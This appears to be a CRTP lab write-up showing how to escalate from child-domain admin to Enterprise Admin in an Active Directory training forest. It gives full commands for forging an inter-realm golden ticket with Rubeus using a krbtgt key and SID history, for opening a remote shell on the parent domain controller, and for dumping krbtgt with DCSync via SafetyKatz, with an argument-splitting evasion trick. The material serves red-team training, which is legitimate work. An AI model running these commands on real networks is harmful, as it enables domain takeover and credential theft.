CRTP Lab 19

Task

Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash.

Since we already have krbtgt hash from dcorp-dc , we can create the inter-realm TGT and inject it.

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args golden /user:Administrator /id:500 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /netbios:dcorp /ptt

We can now access mcorp-dc

winrs -r:mcorp-dc.moneycorp.local cmd
C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator

C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=MCORP-DC

C:\Users\Administrator.dcorp>

To dump krbtgt\mcorp NTLM

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

OR use DCSync to dump secrets

# ArgSplit for "lsadump::dcsync"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
PreviousUsing KRBTGT HashNextCross Forest

Last updated